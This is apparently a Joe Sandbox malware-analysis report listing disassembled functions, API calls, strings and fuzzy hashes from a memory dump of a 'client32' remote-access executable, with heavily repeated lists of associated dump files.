Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitItemLastProcessSendwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 2046328329-2830328467
Opcode ID: e23e6f8f1d795151bf65504b549d0b3e99ba60d83445b273e5f7e54ace8b4032
Instruction ID: d6c174be7095a88acf08c8c7035f1bfcc606cf11c581344454f7ad96a18f94da
Opcode Fuzzy Hash: e23e6f8f1d795151bf65504b549d0b3e99ba60d83445b273e5f7e54ace8b4032
Instruction Fuzzy Hash: 68E01AB6610269AFD714DE85EC80EE7B3ACAB48794F008429FA5997240D6B0E95087A1

Function 11001040 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,?,?,?), ref: 11001073

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

m_hWnd, xrefs: 11001056
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001051

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastProcessSendwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 819365019-2830328467
Opcode ID: a478cc059458106cf5704ce56e7de4ccd4a723f7f74860f299d0b8ca43b93d71
Instruction ID: 2149dfb7d7fad2f484445a2ad992c90f1569e5591f5ea3f8663e4569b2fc6047
Opcode Fuzzy Hash: a478cc059458106cf5704ce56e7de4ccd4a723f7f74860f299d0b8ca43b93d71
Instruction Fuzzy Hash: 6EE086B5A00359BFD710DE45DCC5FD7B3ACEF54765F008429F95987240D6B0E99087A1

Function 110010D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

PostMessageA.USER32(?,?,?,?), ref: 11001103

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

m_hWnd, xrefs: 110010E6
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010E1

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastPostProcesswsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 906220102-2830328467
Opcode ID: 6e48cc0f22709dd1f677f00fe8a235e90bb64895bbfe6d3762ec5bb3e875e095
Instruction ID: 526bb494f44a88d6c72e7bb0fbd3121225ec46d2648d8932a1e0f472dc4001e3
Opcode Fuzzy Hash: 6e48cc0f22709dd1f677f00fe8a235e90bb64895bbfe6d3762ec5bb3e875e095
Instruction Fuzzy Hash: F9E086B5A0021DBFD710DE45DC85FD7B3ACEB48764F008429FA1487600DAB0F950C7A0

Function 11015680 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23timeCOMMON

Download Yara Rule

APIs

KillTimer.USER32(?,?), ref: 110156AB

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

m_hWnd, xrefs: 11015696
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11015691

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitKillLastMessageProcessTimerwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 2229609774-2830328467
Opcode ID: 4f9c51c1163bf8913fde59a01c8678a66c8feca1fc5ec587663269088d57b80b
Instruction ID: 7ae664625a1ce1be833339671640630068cd4088b0e63f30b6a4550177604bc9
Opcode Fuzzy Hash: 4f9c51c1163bf8913fde59a01c8678a66c8feca1fc5ec587663269088d57b80b
Instruction Fuzzy Hash: 9BE08675700329AFC314EB55EC80E96F3ECEF58714F008429F96557740DA75E98087D5

Function 1101D070 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

MapWindowPoints.USER32(00000000,?,?,00000001), ref: 1101D09F

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

m_hWnd, xrefs: 1101D086
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1101D081

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessagePointsProcessWindowwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 2663631564-2830328467
Opcode ID: fa98f24b7545a8703a321d683b87b1dea4d1bd6490adb13a2f25d9d98fe671f0
Instruction ID: 9c4b2b82cd9adc94e853c670648ed6e4092ddceab183af3ebe85ec827fccdc52
Opcode Fuzzy Hash: fa98f24b7545a8703a321d683b87b1dea4d1bd6490adb13a2f25d9d98fe671f0
Instruction Fuzzy Hash: 8FE0C2B1640319BBD210DA41EC86FE6B39C8B10765F008039F61856580D9B0A98087A1

Function 11035730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,WTSGetActiveConsoleSessionId), ref: 11035741
SetLastError.KERNEL32(00000078), ref: 11035757

Strings

WTSGetActiveConsoleSessionId, xrefs: 1103573B

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: WTSGetActiveConsoleSessionId
API String ID: 199729137-985505475
Opcode ID: 5aeb613780d4317b6c4fe32fb8bb10cba1a23ef9b8a27ed88a1ac7ef06f6d1ab
Instruction ID: dfe2ba98866f40b925ff5ae74b5290a810f1b4d05858a75e8431e5ab4ea7c49c
Opcode Fuzzy Hash: 5aeb613780d4317b6c4fe32fb8bb10cba1a23ef9b8a27ed88a1ac7ef06f6d1ab
Instruction Fuzzy Hash: 74E0C231D12A308FC7219F6CF848789B7E4EF45B32F014A5AEAB593284C731A8818B91

Function 11001110 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,?), ref: 1100113B

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

m_hWnd, xrefs: 11001126
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001121

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcessShowWindowwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 1604732272-2830328467
Opcode ID: b3706d9d212bc44fc63b143c127adaed75df49cf66e2e4508a4744c3dc3a7521
Instruction ID: 23928ab379678a07e0f3a28c7a56dac56e7f9ec3f6936ec539a74ac81f8319a0
Opcode Fuzzy Hash: b3706d9d212bc44fc63b143c127adaed75df49cf66e2e4508a4744c3dc3a7521
Instruction Fuzzy Hash: 4FD02BB5A1032DABC314CA41DC81FD2F3AC9B103A4F004039F62442100D571E540C394

Function 11001000 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19timeCOMMON

Download Yara Rule

APIs

KillTimer.USER32(?,?), ref: 1100102B

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

m_hWnd, xrefs: 11001016
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001011

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitKillLastMessageProcessTimerwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 2229609774-2830328467
Opcode ID: c668625be9c396e8122871d0668cda4b42639a8560f619d3b9b323c4263c3f1c
Instruction ID: ee2bff440c1eeb311b517f53df1393b18d0186c38d15746519086ed5f67e1e1e
Opcode Fuzzy Hash: c668625be9c396e8122871d0668cda4b42639a8560f619d3b9b323c4263c3f1c
Instruction Fuzzy Hash: 50D02BB260032DABC310D641DC80FD2B3DCDB04364F008039FA5442140D670E4808390

Function 1100D4C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19libraryCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(1100D73E,?), ref: 1100D4C9
LoadLibraryA.KERNEL32(AudioCapture.dll), ref: 1100D4D8

Strings

AudioCapture.dll, xrefs: 1100D4D3

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LibraryLoadVersion
String ID: AudioCapture.dll
API String ID: 3209957514-2642820777
Opcode ID: 31160a4b39b369407e5d036c5ac5907d5ccb4198c4cf7eae390eb598ea28f55a
Instruction ID: de40c63e4a8a4fcde3dee2054331c33ed72f965d5ee4918db061c4a53d5809d0
Opcode Fuzzy Hash: 31160a4b39b369407e5d036c5ac5907d5ccb4198c4cf7eae390eb598ea28f55a
Instruction Fuzzy Hash: 6AE01774E001638BF3029FB5884838E76D0A740699FC280B0ED22C0548FF6894808B31

Function 11131420 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 16timeCOMMON

Download Yara Rule

APIs

KillTimer.USER32(?,00000001,?,11049246), ref: 11131446

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

m_hWnd, xrefs: 11131433
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1113142E

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitKillLastMessageProcessTimerwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 2229609774-2830328467
Opcode ID: 205b0686d5236623331a90bfebdaad10eac3ab33d7e388880e187d4356a02918
Instruction ID: cbf25270b3b0651c58eed5869a3c9c02c4a96de395069bf87a5b764b24bbb751
Opcode Fuzzy Hash: 205b0686d5236623331a90bfebdaad10eac3ab33d7e388880e187d4356a02918
Instruction Fuzzy Hash: 1AD0A775A503659FD7209626EC85FC1B2E81F04718F048428F55567584D7B4E4C08755

Function 1110F3E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowA.USER32(MSOfficeWClass,00000000), ref: 1110F3EA
SendMessageA.USER32(00000000,00000414,00000000,00000000), ref: 1110F400

Strings

MSOfficeWClass, xrefs: 1110F3E5

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
